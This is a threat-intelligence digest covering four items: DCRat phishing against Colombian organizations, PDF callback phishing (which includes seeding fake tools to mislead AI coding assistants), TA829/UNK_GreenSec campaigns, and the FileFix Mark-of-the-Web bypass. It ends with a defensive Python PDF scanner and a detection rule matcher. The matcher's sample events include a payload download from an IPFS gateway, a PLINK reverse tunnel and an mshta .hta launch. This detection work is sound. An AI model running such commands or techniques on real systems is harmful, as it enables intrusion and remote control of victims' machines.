Update: DCRat Deployed in Phishing Campaign Targeting Windows Systems Across Colombian Organizations
A newly observed malware campaign is actively targeting organizations in Colombia with a focus on delivering DCRat (DarkCrystal RAT), a modular and commercially available Remote Access Trojan. This campaign, identified by Fortinet’s IR team, primarily abuses phishing emails impersonating Colombian government entities to deliver the malware. The emails carry password-protected ZIP archives containing a batch script that downloads an obfuscated VBS file, which in turn retrieves and executes a .NET-based payload concealed within an image via steganography. The final executable is decrypted using a hardcoded AES256 key and placed in a public directory, granting the attacker remote access to the infected system. DCRat is not a new tool—it has been circulating in underground forums since at least 2018—but this campaign marks a shift in geographic focus, targeting South American organizations, particularly those in the government and critical infrastructure sectors in Colombia. The malware is compatible with most Windows operating systems, including Windows 10 and 11, and can function on both user workstations and networked servers, extending its reach and damage potential within enterprise environments. Once installed, DCRat enables attackers to gain full control of the compromised system, offering capabilities such as keylogging, screenshot capture, file manipulation, system configuration changes, credential harvesting, and browser data theft. The malware also includes self-preservation features, including the ability to mark itself as a critical system process, which can crash the host via Blue Screen of Death if terminated with elevated privileges. While this campaign is currently focused on Colombia, DCRat’s accessibility and adaptability make it a broader risk to other regions—particularly where organizations lack robust email defenses or EDR visibility.
The actor behind this campaign has not been definitively identified, but DCRat is commonly used by Russian-speaking cybercriminal groups and has been linked to infostealer distribution chains in prior global attacks. Its reuse here suggests either a local threat actor leveraging an established tool or the involvement of a broader, profit-driven cybercrime group expanding its reach.
Update: PDF-Based Callback Phishing Campaigns Leverage Brand Impersonation and Voice Attacks
Threat actors are increasingly relying on PDF-based phishing campaigns that exploit brand impersonation and social engineering to initiate Telephone-Oriented Attack Delivery (TOAD), a tactic in which victims are manipulated into calling fake support lines. These phishing emails often impersonate trusted brands, including Microsoft, DocuSign, PayPal, NortonLifeLock, and Geek Squad, and are crafted to appear urgent, referencing fraudulent transactions, expired subscriptions, or pending invoices. The emails include attached PDF files embedded with QR codes, hyperlinks, or annotations that redirect users to phishing portals or prompt a phone call. Once on the call, attackers posing as support agents use scripted interactions, spoofed caller IDs, and convincing technical jargon to manipulate victims into installing remote access tools, such as TeamViewer or AnyDesk, or into surrendering their credentials and payment details. A key technique also observed involves Microsoft 365's Direct Send feature, which allows phishing emails to spoof internal company addresses without actually compromising an account. This enables messages to bypass many traditional email security filters, increasing their credibility and success rate within corporate environments. Beyond typical phishing mechanics, attackers have expanded their arsenal by leveraging QR code-based PDF payloads with embedded URLs hidden within PDF form fields or sticky notes—methods that allow links to evade detection by some email gateways. Some campaigns also involve AI poisoning strategies, in which fake APIs and malicious open-source tools are seeded across platforms like GitHub and Stack Overflow to mislead AI coding assistants or large language models into recommending compromised domains. These techniques reflect a highly coordinated and multi-layered phishing ecosystem. 
The FBI has issued public warnings about groups like Luna Moth, which have used TOAD attacks to infiltrate corporate networks by posing as internal IT or finance departments. With attackers now blending traditional phishing, AI manipulation, and SEO poisoning, the threat landscape has become more complex and challenging to track, posing a significant risk to organizations that lack sufficient awareness training and detection capabilities.
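As an added example (not code from the report above), a small stdlib-only Python scanner that flags the PDF carriers described here: link annotations with URI actions, URLs tucked into sticky-note (/Text) comments, URLs placed in text form-field values, and Launch actions. The sample PDF bytes are constructed for this example and kept uncompressed so the regexes can read the objects directly; QR codes are images and would need a separate decoder.

```python
import re

# Constructed sample PDF: one page whose annotations smuggle URLs three
# different ways (link action, sticky-note text, form-field value).
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /AcroForm << /Fields [6 0 R] >> >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R 5 0 R 6 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 10 10] /A << /S /URI /URI (https://invoice-review.example/pay) >> >> endobj
5 0 obj << /Type /Annot /Subtype /Text /Rect [0 0 10 10] /Contents (Call support now: http://support-desk.example/renew) >> endobj
6 0 obj << /Type /Annot /Subtype /Widget /FT /Tx /T (ref) /V (https://verify-account.example/login) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

OBJ_RE = re.compile(rb"(\d+) 0 obj(.*?)endobj", re.S)
URL_RE = re.compile(rb"https?://[^\s()<>\[\]]+")

# Where each kind of smuggled URL lives; whitespace between name and value is optional in PDF syntax.
LAUNCH_RE = re.compile(rb"/S\s*/Launch")
LINK_RE = re.compile(rb"/Subtype\s*/Link")
NOTE_RE = re.compile(rb"/Subtype\s*/Text")
FIELD_RE = re.compile(rb"/FT\s*/Tx")


def scan_pdf(data: bytes) -> list[dict]:
    """Return one finding per uncompressed PDF object that carries a URL or Launch action."""
    findings = []
    for num, body in OBJ_RE.findall(data):
        urls = [u.decode("latin-1") for u in URL_RE.findall(body)]
        kind = None
        if LAUNCH_RE.search(body):
            kind = "launch action"          # executes a local program on open
        elif LINK_RE.search(body) and b"/URI" in body:
            kind = "link annotation"        # the classic clickable hyperlink
        elif NOTE_RE.search(body) and urls:
            kind = "sticky-note comment"    # URL hidden in an annotation comment
        elif FIELD_RE.search(body) and urls:
            kind = "form field value"       # URL hidden in a text form field
        if kind:
            findings.append({"obj": int(num), "kind": kind, "urls": urls})
    return findings


if __name__ == "__main__":
    for f in scan_pdf(SAMPLE_PDF):
        print(f"obj {f['obj']}: {f['kind']} -> {', '.join(f['urls'])}")
```

Compressed object streams (/FlateDecode) must be inflated before this scan sees them; a real triage pipeline would do that with a PDF library first.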
TA829 and UNK_GreenSec Share Tactics, Infrastructure in Overlapping Malware Campaigns
Proofpoint researchers have identified operational overlaps between two threat clusters—TA829 and a lesser-known actor dubbed UNK_GreenSec—both of which use shared tactics, tools, and infrastructure in malware delivery campaigns. TA829, known for deploying the RomCom RAT and linked to espionage and financially driven operations, has now been observed with similar tooling and delivery methods as UNK_GreenSec, which uses a malware loader called TransferLoader. Both groups leverage phishing emails containing links or PDF attachments that redirect to spoofed file-sharing pages, filtering out unwanted traffic and targeting real users. These campaigns have utilized compromised MikroTik routers as part of the REM Proxy infrastructure to relay traffic anonymously, allowing both clusters to send phishing emails through new freemail accounts and evade detection. Once the user interacts with the lure, the malware paths diverge: TA829 typically deploys SlipScreen, while UNK_GreenSec drops TransferLoader, both designed to load additional payloads post-infection. TA829 and UNK_GreenSec also share specific malware techniques, like using PuTTY’s PLINK tool to establish SSH tunnels and relying on IPFS for hosting follow-on components. SlipScreen checks system activity by querying how many recent documents a user has opened as a way to avoid sandboxes before loading shellcode that leads to payloads like MeltingClaw or RustyClaw. These tools eventually deploy RATs, such as RomCom (also known as SingleCamper), which are capable of surveillance and data exfiltration. TransferLoader, on the other hand, focuses on the stealthy delivery of malware, including Metasploit and the Morpheus ransomware. Though it remains unclear whether these two clusters are separate, partnered, or part of the same entity, the extent of shared infrastructure and tooling suggests a close relationship.
As espionage and cybercrime operations increasingly overlap, analysts are observing threat groups reuse resources, which complicates attribution and defensive strategies.
FileFix Attack Bypasses Windows Security Warnings via Saved Web Content Exploit
The FileFix Attack is a newly identified technique that exploits how modern browsers, notably Chrome and Edge, handle saved web content, enabling malicious files to bypass Windows' Mark of the Web (MOTW) protections. MOTW is intended to mark files downloaded from the internet as potentially unsafe, triggering warnings when users attempt to open them. However, this attack exploits a loophole where certain MIME types—specifically text/html and application/xhtml+xml—do not apply MOTW when users save content using the browser’s “Save As” or Ctrl+S functionality. When attackers craft malicious HTML pages under these MIME types and guide users to save them as [.]mhtml or [.]html, no security flags are applied. If the file is saved or renamed with an [.]hta (HTML Application) extension, it bypasses MOTW entirely. Because [.]hta files can execute embedded scripts natively, attackers can embed JScript that runs silently on execution—without prompts—allowing actions like launching command shells or downloading payloads. The attack’s success depends on social engineering, not a software vulnerability. Threat actors commonly disguise phishing pages as legitimate content, like backup code generators, and instruct victims to save the page using a specific filename ending in [.]hta (e.g., “MfaBackupCodes2025[.]hta”). By manipulating the page’s <title> or download instructions, attackers trick users into preserving the malicious extension despite browser defaults that typically append [.]html. Additionally, they may use Data URIs with base64-encoded HTML content that, when saved locally, retains the original MIME type and still avoids MOTW. This method presents a significant risk because it combines user behavior with technical blind spots, enabling malware execution without triggering common defenses.
While disabling mshta.exe can help mitigate risk, the tactic could be repurposed with other file types or scripting engines, making user training and stricter file handling policies essential.
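As an added example (not code from any of the reports above), a Python rule matcher that runs over constructed Sysmon-style process-creation events and flags the host-side behaviors described in three of these items: PLINK tunnel switches and IPFS gateway fetches (TA829/UNK_GreenSec), mshta.exe executing a [.]hta from a user-writable folder (FileFix), and a script host running a [.]vbs out of Temp or Downloads (the DCRat chain). Event fields, usernames, paths, the TEST-NET address and the CID placeholder are all constructed for this example.

```python
import re

# Each rule: name, the image basenames it applies to (None = any image), and a
# regex over the command line.  Thresholds are deliberately simple; tune to your estate.
RULES = [
    ("plink_ssh_tunnel", {"plink.exe"},
     re.compile(r"(^|\s)-(R|L|D|N)(\s|$)")),                       # forwarding/no-shell switches
    ("ipfs_gateway_fetch", None,
     re.compile(r"/ipfs/[A-Za-z0-9]{20,}", re.I)),                  # any process pulling a CID
    ("mshta_hta_user_dir", {"mshta.exe"},
     re.compile(r"\\Users\\[^\\]+\\(Downloads|Desktop|Documents|AppData)\\.*\.hta\b", re.I)),
    ("script_host_vbs_user_dir", {"wscript.exe", "cscript.exe"},
     re.compile(r"\\(Users\\[^\\]+\\(Downloads|AppData)|Temp)\\.*\.vbs\b", re.I)),
]

# Constructed sample events; only event 5 (a normal browser launch) should stay quiet.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" "C:\Users\alice\Downloads\MfaBackupCodes2025.hta"'},
    {"id": 2, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Users\alice\AppData\Local\Temp\plink.exe",
     "cmdline": r"plink.exe -N -R 2222:127.0.0.1:3389 relay@203.0.113.10"},
    {"id": 3, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -c iwr https://gateway.example/ipfs/CONSTRUCTEDCIDPLACEHOLDER0000 -OutFile x.bin"},
    {"id": 4, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe //B "C:\Users\alice\AppData\Local\Temp\gov_notice.vbs"'},
    {"id": 5, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default'},
]


def match_events(events):
    """Return (event id, rule name) pairs for every rule each event trips, in input order."""
    hits = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()   # basename of the executable
        for name, images, pattern in RULES:
            if images is not None and image not in images:
                continue
            if pattern.search(ev["cmdline"]):
                hits.append((ev["id"], name))
    return hits


if __name__ == "__main__":
    for event_id, rule in match_events(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```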